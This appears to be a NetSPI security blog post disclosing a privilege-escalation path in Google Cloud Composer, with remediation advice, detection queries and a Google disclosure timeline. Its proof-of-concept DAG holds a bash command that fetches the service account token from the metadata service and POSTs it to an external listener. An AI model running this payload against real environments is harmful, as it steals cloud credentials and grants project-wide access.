Key points:

- Cloud Composer is built on Apache Airflow and closely integrated with GCP services.

- Write access to the environment's Cloud Storage bucket can lead to privilege escalation in the Composer environment.

- By default, Composer uses the Default Compute Engine Service Account, which has Editor permissions on the entire project.

- Attackers can upload malicious DAG files to gain command execution without needing access to the Airflow UI.

- NetSPI reported the issue to Google, which classified it as Intended Behavior.

MITRE Techniques

- Privilege Escalation (T1068): Exploits vulnerabilities in software to gain elevated access to resources.

- Application Layer Protocol (T1071): Uses a standard application-layer protocol (here, an HTTPS POST request) to communicate with attacker-controlled infrastructure.

- Exfiltration Over C2 Channel (T1041): Transfers data (here, the service account access token) from the compromised environment to an external location.

- Access Token Manipulation (T1134): Manipulates access tokens to gain unauthorized access to resources.

Cloud Composer is a managed service in Google Cloud Platform that allows users to manage workflows. Cloud Composer is built on Apache Airflow and is integrated closely with multiple GCP services. One key component of the managed aspect of Cloud Composer is the use of Cloud Storage to support the environment’s data.

Per GCP documentation: “When you create an environment, Cloud Composer creates a Cloud Storage bucket and associates the bucket with your environment… Cloud Composer synchronizes specific folders in your environment’s bucket to Airflow components that run in your environment.”

This blog post walks through how an attacker can escalate privileges in Cloud Composer by targeting the environment’s dedicated Cloud Storage bucket to gain command execution. We will also discuss the impact of using default configurations and how these can be leveraged by an attacker.

TL;DR

- An attacker that has write access to the Cloud Composer environment’s dedicated bucket (pre-provisioned or gained through other means) can gain command execution in the Composer environment. This command execution can be leveraged to access the Composer environment’s attached service account.

- The “dags” folder in the Storage Bucket automatically syncs to Composer. A specially crafted Python DAG can be created to gain command execution in the Composer environment.

- An attacker ONLY needs write access to the Storage Bucket (pre-provisioned or gained through other means). No permissions on the actual Composer service are needed.

- By default, the Composer service uses the Default Compute Engine Service Account, which is itself granted Editor on the entire project by default.

- NetSPI reported this issue to the Google VRP, which closed the ticket with a status of Intended Behavior.

Environment Bucket and DAGs

As mentioned before, Composer relies on Cloud Storage for dedicated environment data storage. Multiple folders are created for the environment in the bucket, including the “dags” folder. Apache Airflow workflows are made up of Directed Acyclic Graphs (DAGs). DAGs are defined in Python code and can perform tasks such as ingesting data or sending HTTP requests. These files are stored in the Storage bucket’s “dags” folder.

Composer automatically syncs the contents of the “dags” folder to Airflow. This is significant because anyone who has write access to this folder can write their own DAG, upload it to this folder, and have the DAG synced to the Airflow environment without ever having access to Composer or Airflow.

An attacker with write access (pre-provisioned or gained through other means) could leverage the following attack path:

- Create an externally available listening web server.

- Create a specially crafted DAG file that is configured to run immediately upon pickup by the Airflow scheduler. The DAG file queries the metadata service for a Service Account token and sends it to the externally available web server.

- Upload the DAG to the “dags” folder in the Storage Bucket. The DAG file is automatically synced into Airflow.

- Wait for the DAG to be picked up by the scheduler and executed. This does NOT require any access to the Airflow UI or any manual triggering. The DAG runs automatically in a default configuration.

- Monitor the listening web server for a POST request containing the Service Account access token.

- Authenticate with the access token.

Proof of Concept



Assume a GCP project (cc-demo) has been created with all default settings. This includes the Compute Engine service being enabled, along with the Default Compute Engine Service Account, which has Editor on the project.



The Cloud Composer service has also been enabled, and an environment (composer-demo) with default settings has been created via the UI. Note that the environment uses the Default Compute Engine Service Account by default.

A dedicated Cloud Storage bucket has also been created for the new Composer environment. All the documented Airflow folders have been automatically created.

The attacker (demo-user) has write access to all buckets in the project, including the dedicated Composer bucket.

An example Python DAG like the one below can be used to gain command execution in the Composer environment. There are a few important sections in the DAG to highlight:

- the start_date has been set to a day ago

- catchup is True

- the BashOperator has been used to query the metadata service for a token which is then sent outbound to a listening web server

Note that this is just a single example of what could be done with write access.

```python
"""netspi test"""
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta

default_args = {
    'start_date': airflow.utils.dates.days_ago(1),
    'retries': 1,
    'retry_delay': timedelta(minutes=1),
    'depends_on_past': True,
}

dag = DAG(
    'netspi_dag_test',
    default_args=default_args,
    description='netspi',
    # schedule_interval=None,
    max_active_runs=1,
    catchup=True,
    dagrun_timeout=timedelta(minutes=5))

# priority_weight has type int in Airflow DB, uses the maximum.
t1 = BashOperator(
    task_id='netspi_dag',
    bash_command='ev=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H "Metadata-Flavor: Google");curl -X POST -H "Content-Type: application/json" -d "$ev" https://[REDACTED]/test',
    dag=dag,
    depends_on_past=False,
    priority_weight=2**31 - 1,
    do_xcom_push=False)
```
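The DAG starts on its own because of how the highlighted settings interact with Airflow's scheduler. In Airflow 2.x, a DAG with no schedule_interval falls back to a daily schedule, and a run for a data interval becomes due once that interval has ended. Because days_ago(1) resolves to midnight UTC of the previous day, the first daily interval has already closed when the file is parsed, so the scheduler creates a run right away (assuming the DAG is not paused on creation, as in the default configuration tested here). The sketch below is a simplified, hypothetical model of that rule in plain Python, not Airflow's actual scheduler code; the due_intervals helper and the fixed timestamps are illustrative.

```python
from datetime import datetime, timedelta, timezone


def due_intervals(start_date, now, interval=timedelta(days=1), catchup=True):
    """Return the (start, end) data intervals a simplified scheduler would run.

    Simplified model (assumption): a run for the interval [start, end) is due
    once end <= now. With catchup=False only the most recent due interval
    is kept.
    """
    intervals = []
    start = start_date
    while start + interval <= now:
        intervals.append((start, start + interval))
        start += interval
    if not catchup:
        return intervals[-1:]
    return intervals


# days_ago(1) resolves to midnight UTC one day back; model that explicitly.
now = datetime(2024, 7, 22, 15, 30, tzinfo=timezone.utc)
midnight_today = now.replace(hour=0, minute=0, second=0, microsecond=0)
start_date = midnight_today - timedelta(days=1)

for begin, end in due_intervals(start_date, now):
    print(f"run due for interval {begin.isoformat()} -> {end.isoformat()}")
```

With catchup=True, every missed interval since start_date would be scheduled; with the one-day-old start_date used in the PoC, there is exactly one, and it is already due.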



The demo-user can then upload the example Python DAG file to the dags folder.

The DAG file will eventually sync to Airflow, get picked up by the scheduler, and run automatically. The resulting POST request, containing the token, then appears in the web server logs (or in Burp Suite Pro’s Collaborator, if that is used as the listener).

The token can then be used with the gcloud CLI or the REST APIs directly.

Prevention and Remediation



Google VRP classified this issue as Intended Behavior. Per Google documentation, managing IAM permissions on the environment’s Cloud Storage bucket is the customer’s responsibility. Google updated this documentation to more clearly outline the danger of someone gaining write access to this bucket.

Cloud Composer’s default behavior of assigning the Default Compute Engine Service Account (which is granted Editor on the project by default) is also documented by Google.
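One quick way to check for this default is to compare the environment’s service account email with the documented naming pattern of the Default Compute Engine Service Account, PROJECT_NUMBER-compute@developer.gserviceaccount.com. A minimal sketch, assuming the email has already been retrieved from the environment’s configuration (for example, the config.nodeConfig.serviceAccount field in the output of `gcloud composer environments describe`); the helper name and sample emails are hypothetical.

```python
import re

# Documented format of the Default Compute Engine Service Account:
# <PROJECT_NUMBER>-compute@developer.gserviceaccount.com
DEFAULT_COMPUTE_SA = re.compile(r"^(\d+)-compute@developer\.gserviceaccount\.com$")


def uses_default_compute_sa(service_account_email):
    """Return True if the email matches the Default Compute Engine SA pattern."""
    return bool(DEFAULT_COMPUTE_SA.match(service_account_email.strip().lower()))


# Hypothetical values, e.g. taken from config.nodeConfig.serviceAccount.
for email in [
    "123456789012-compute@developer.gserviceaccount.com",
    "composer-runner@cc-demo.iam.gserviceaccount.com",
]:
    status = "default Compute Engine SA" if uses_default_compute_sa(email) else "custom SA"
    print(f"{email}: {status}")
```

A match only says which account is attached; whether it still holds Editor has to be confirmed against the project’s IAM policy.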

NetSPI recommends reviewing all pertinent Google documentation on securing Cloud Composer. Specifically for this attack vector:

- Include the services used to support Cloud Composer in the overall threat model, as the security of those services will affect Composer.

- Follow the principle of least privilege when granting permissions to Cloud Storage in a project that uses Cloud Composer. Review all identities that have write access to the environment’s bucket and remove any identities with excessive access.

- Follow the principle of least privilege when assigning a service account to Cloud Composer. Avoid using the Default Compute Engine Service Account due to its excessive permissions.
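Reviewing who can write to the environment’s bucket can be partly scripted. A minimal sketch, assuming the bucket’s IAM policy has been exported as JSON (for example, with `gcloud storage buckets get-iam-policy gs://BUCKET --format=json`, where BUCKET is a placeholder): it reports members bound to a small, illustrative set of predefined roles that include object write permissions. It does not cover custom roles, IAM conditions, or permissions granted at the project, folder, or organization level, so it is a starting point rather than a complete access review. The helper name and the sample policy are hypothetical.

```python
import json

# Illustrative, non-exhaustive set of predefined Cloud Storage roles that
# include object write permissions (storage.objects.create).
WRITE_ROLES = {
    "roles/storage.admin",
    "roles/storage.objectAdmin",
    "roles/storage.objectCreator",
    "roles/storage.objectUser",
    "roles/storage.legacyBucketOwner",
    "roles/storage.legacyBucketWriter",
}


def members_with_write(policy):
    """Map each member to the write-capable roles it holds in a bucket IAM policy.

    IAM conditions on bindings are ignored by this sketch.
    """
    result = {}
    for binding in policy.get("bindings", []):
        if binding.get("role") in WRITE_ROLES:
            for member in binding.get("members", []):
                result.setdefault(member, set()).add(binding["role"])
    return result


# Hypothetical policy export for the environment's bucket.
policy = json.loads("""
{
  "bindings": [
    {"role": "roles/storage.legacyBucketOwner",
     "members": ["projectEditor:cc-demo", "projectOwner:cc-demo"]},
    {"role": "roles/storage.objectViewer",
     "members": ["user:analyst@example.com"]},
    {"role": "roles/storage.objectAdmin",
     "members": ["user:demo-user@example.com"]}
  ]
}
""")

for member, roles in sorted(members_with_write(policy).items()):
    print(member, sorted(roles))
```

In this hypothetical export, projectEditor:cc-demo stands for every principal with Editor on the project, which in a default setup includes the Default Compute Engine Service Account itself.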

Detection

The following may be helpful for organizations that want to actively detect on the attack vector described. Note that these opportunities are meant to provide a starting point and may not work as written for every organization’s use case.

Data Source: Cloud Composer Streaming Logs

Detection Strategy: Behavior

Detection Concept: Detect new Python files being created in the “dags” folder of the environment’s storage bucket. Alternatively, detect when a new DAG is synced from the bucket to the Composer environment, using the gcs-syncd logs.

Detection Reasoning: A user that has write access to the bucket could gain command execution in the Composer environment via rogue DAG files.

Known Detection Consideration: New DAGs will be created as part of legitimate activity and exceptions may need to be added.
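Outside of the streaming logs, the first detection concept can also be approximated by periodically listing the objects under the bucket’s dags/ folder and comparing the result against a known-good baseline. The sketch below assumes both listings are object names relative to the bucket (for example, collected with `gcloud storage ls` and stripped of the gs:// prefix); the helper name and object names are hypothetical.

```python
def new_dag_files(baseline, current, folder="dags/"):
    """Return Python files under `folder` present in `current` but not in `baseline`.

    Both arguments are iterables of object names relative to the bucket,
    e.g. "dags/etl_daily.py".
    """
    known = set(baseline)
    return sorted(
        name for name in current
        if name.startswith(folder) and name.endswith(".py") and name not in known
    )


# Hypothetical listings taken at two points in time.
baseline = ["dags/airflow_monitoring.py", "dags/etl_daily.py", "data/input.csv"]
current = baseline + ["dags/netspi_test.py", "plugins/helper.py", "data/new.csv"]

for name in new_dag_files(baseline, current):
    print("ALERT: new DAG file", name)
```

Airflow can also load DAGs packaged as .zip files, so matching only on the .py suffix is a simplification, and a name-only comparison will not notice an existing DAG file being modified.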

Example Instructions:

Refer to https://cloud.google.com/composer/docs/concepts/logs#streaming.

- Browse to Logs Explorer

- Enter the query below and substitute the appropriate values

- Select “gcs-syncd”, “airflow-scheduler”, or “airflow-worker” to review the logs

resource.type="cloud_composer_environment" resource.labels.location="<ENTER_LOCATION_HERE>" resource.labels.environment_name="<ENTER_COMPOSER_RESOURCE_NAME>"
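When several environments need the same review, the filter can be generated rather than edited by hand. A minimal sketch: it reproduces the query above for a given location and environment name and can optionally narrow it with the Logging query language’s log_id() function. It assumes each component writes to a log named after it (gcs-syncd, airflow-scheduler, airflow-worker); the helper name is hypothetical. Clauses are placed on separate lines, which Logs Explorer combines with an implicit AND.

```python
COMPONENT_LOGS = {"gcs-syncd", "airflow-scheduler", "airflow-worker"}


def composer_log_filter(location, environment_name, component=None):
    """Build a Logs Explorer filter for one Composer environment."""
    # Keep the sketch simple: refuse values that would need escaping.
    for value in (location, environment_name):
        if '"' in value:
            raise ValueError("quotes are not allowed in filter values")
    clauses = [
        'resource.type="cloud_composer_environment"',
        f'resource.labels.location="{location}"',
        f'resource.labels.environment_name="{environment_name}"',
    ]
    if component is not None:
        if component not in COMPONENT_LOGS:
            raise ValueError(f"unexpected component: {component}")
        clauses.append(f'log_id("{component}")')
    return "\n".join(clauses)


print(composer_log_filter("us-central1", "composer-demo", component="gcs-syncd"))
```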



gcs-syncd example



airflow-worker example

Google Bug Hunters VRP Timeline

NetSPI worked with Google on coordinated disclosure.

- 07/22/2024 – Report submitted

- 07/23/2024 – Report triaged and assigned

- 07/25/2024 – Status changed to In Progress (Accepted) with type Bug

- 08/10/2024 – Status changed to Won’t Fix (Intended Behavior)

- 08/13/2024 – Google provides additional context

- 09/02/2024 – Coordinated Disclosure process begins

- 09/30/2024 – Coordinated Disclosure process ends

Learn more about escalating privileges in Google Cloud:

Escalating Privileges in Google Cloud via Open Groups

The post Filling up the DagBag: Privilege Escalation in Google Cloud Composer appeared first on NetSPI.

Source: Original Post